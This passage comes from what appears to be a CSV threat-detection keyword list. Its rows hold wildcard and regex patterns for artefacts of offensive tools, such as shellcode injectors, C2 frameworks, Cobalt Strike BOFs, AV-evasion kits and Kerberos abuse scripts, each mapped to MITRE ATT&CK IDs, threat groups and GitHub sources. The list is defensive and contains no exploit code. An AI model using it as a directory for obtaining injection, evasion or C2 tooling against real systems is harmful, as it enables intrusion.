tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*InjectLibraryDrv_x64.sys*",".{0,1000}InjectLibraryDrv_x64\.sys.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" 
"*Inject-LocalShellcode*",".{0,1000}Inject\-LocalShellcode.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*InjectMate.py*",".{0,1000}InjectMate\.py.{0,1000}","offensive_tool_keyword","burpsuite","Multi-tabbed extension that helps generate payloads for various purposes (XSS. SQLi. Header injection. 
and more).","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","139","33","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*InjectMateCommunity.py*",".{0,1000}InjectMateCommunity\.py.{0,1000}","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","139","33","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" "*Injector.exe*",".{0,1000}Injector\.exe.{0,1000}","offensive_tool_keyword","POC","POC to check for CVE-2020-0796 / SMBGhost Expected outcome: cmd.exe launched with system access","T1210.001 - T1213 - T1212 - T1201","TA0007 - TA0002","N/A","N/A","Exploitation tools","https://github.com/ZecOps/CVE-2020-0796-LPE-POC","1","1","N/A","N/A","3","243","90","2020-04-02T08:01:38Z","2020-03-30T16:06:50Z" "*injector.ps1*.kirbi*",".{0,1000}injector\.ps1.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","PowershellKerberos","Some scripts to abuse kerberos using Powershell","T1558.003 - T1558.004 - T1059.001","TA0006 - TA0002","N/A","N/A","Exploitation Tools","https://github.com/MzHmO/PowershellKerberos","1","0","N/A","9","3","293","42","2023-07-27T09:53:47Z","2023-04-22T19:16:52Z" "*InjectPERemote.cs*",".{0,1000}InjectPERemote\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" 
"*InjectPEWMIFSRemote*",".{0,1000}InjectPEWMIFSRemote.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*InjectProc*",".{0,1000}InjectProc.{0,1000}","offensive_tool_keyword","InjectProc","Process injection is a very popular method to hide malicious behavior of code and are heavily used by malware authors.There are several techniques. which are commonly used: DLL injection. process replacement (a.k.a process hollowing). hook injection and APC injection.","T1055 - T1055.012 - T1055.001 - T1055.003","TA0002 - TA0003 - TA0004 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secrary/InjectProc","1","0","N/A","N/A","10","989","210","2019-02-10T11:05:15Z","2017-05-26T08:08:20Z" "*injectremote.boo*",".{0,1000}injectremote\.boo.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). 
The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2138","405","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z" "*Inject-RemoteShellcode*",".{0,1000}Inject\-RemoteShellcode.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 
- Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*inject-shellcode *",".{0,1000}inject\-shellcode\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*injectShellcode*",".{0,1000}injectShellcode.{0,1000}","offensive_tool_keyword","C2 related tools","Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","N/A","C2","https://github.com/mgeeky/ThreadStackSpoofer","1","1","N/A","10","10","941","169","2022-06-17T18:06:35Z","2021-09-26T22:48:17Z" "*InjectShellcode*",".{0,1000}InjectShellcode.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/ajpc500/BOFs","1","1","N/A","10","10","506","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z" "*InjectShellCode.cs*",".{0,1000}InjectShellCode\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*InjectShellCodeRemote.cs*",".{0,1000}InjectShellCodeRemote\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles 
as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*InjectShellCodeWMIFSB64*",".{0,1000}InjectShellCodeWMIFSB64.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*injectsu.dll*",".{0,1000}injectsu\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*InjectTicket*ptt /ticket:*",".{0,1000}InjectTicket.{0,1000}ptt\s\/ticket\:.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","10","7","661","80","2024-05-01T18:39:44Z","2023-06-20T16:57:27Z" "*inline_assembly -Assembly *",".{0,1000}inline_assembly\s\-Assembly\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1021 - T1021.002 - T1022 - T1032 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","10","10","424","87","2024-05-01T17:07:19Z","2020-11-09T08:05:16Z" "*inlineAssembly*/execmethod*",".{0,1000}inlineAssembly.{0,1000}\/execmethod.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*inlineDll*/dll*",".{0,1000}inlineDll.{0,1000}\/dll.{0,1000}","offensive_tool_keyword","HardHatC2","A C# 
Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*inline-exec.py*",".{0,1000}inline\-exec\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*inline-execute *",".{0,1000}inline\-execute\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","0","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*inline-execute *.o*",".{0,1000}inline\-execute\s.{0,1000}\.o.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*inline-execute *tokenprivileges.o*",".{0,1000}inline\-execute\s.{0,1000}tokenprivileges\.o.{0,1000}","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","4","330","38","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" "*inline-execute StartWebClientSvc.x64.o*",".{0,1000}inline\-execute\sStartWebClientSvc\.x64\.o.{0,1000}","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","0","N/A","10","4","377","44","2024-01-27T08:52:03Z","2022-04-30T10:05:02Z" "*inline-execute*whereami.x64*",".{0,1000}inline\-execute.{0,1000}whereami\.x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","1","N/A","10","10","157","28","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" "*inlineExecute.nim*",".{0,1000}inlineExecute\.nim.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*InlineExecute-Assembly*",".{0,1000}InlineExecute\-Assembly.{0,1000}","offensive_tool_keyword","cobaltstrike","InlineExecute-Assembly is a proof of concept Beacon Object File (BOF) that allows security professionals to perform in process .NET assembly execution as an alternative to Cobalt Strikes traditional fork and run execute-assembly module","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 
- T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/anthemtotheego/InlineExecute-Assembly","1","1","N/A","10","10","547","113","2023-07-22T23:25:15Z","2021-07-08T17:40:07Z" "*InlineShellcode*",".{0,1000}InlineShellcode.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*InlineWhispers.py*",".{0,1000}InlineWhispers\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/InlineWhispers","1","1","N/A","10","10","295","41","2021-11-09T15:39:27Z","2020-12-25T16:52:50Z" "*InlineWhispers2*",".{0,1000}InlineWhispers2.{0,1000}","offensive_tool_keyword","cobaltstrike","Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF) via Syswhispers2","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Sh0ckFR/InlineWhispers2","1","1","N/A","10","10","172","30","2022-07-21T08:40:05Z","2021-11-16T12:47:35Z" "*Input Merlin message base:*",".{0,1000}Input\sMerlin\smessage\sbase\:.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*input/shellcode_enc_raw.txt*",".{0,1000}input\/shellcode_enc_raw\.txt.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*input/shellcode_raw.txt*",".{0,1000}input\/shellcode_raw\.txt.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","0","N/A","10","10","1609","332","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z" "*ins1gn1a/Frampton*",".{0,1000}ins1gn1a\/Frampton.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. 
shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","75","18","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "*InsecurePowerShell*",".{0,1000}InsecurePowerShell.{0,1000}","offensive_tool_keyword","InsecurePowerShell","powershell without securities features","T1059 - T1086 - T1117","TA0002 - TA0003 - TA0040","N/A","N/A","Defense Evasion","https://github.com/cobbr/InsecurePowerShell","1","0","N/A","N/A","2","100","18","2017-12-19T03:40:33Z","2017-12-17T02:16:21Z" "*insecurityofthings*jackit*",".{0,1000}insecurityofthings.{0,1000}jackit.{0,1000}","offensive_tool_keyword","jackit","This is a partial implementation of Bastilles MouseJack exploit. See mousejack.com for more details. Full credit goes to Bastilles team for discovering this issue and writing the libraries to work with the CrazyRadio PA dongle. Also. thanks to Samy Kamkar for KeySweeper. to Thorsten Schroeder and Max Moser for their work on KeyKeriki and to Travis Goodspeed. 
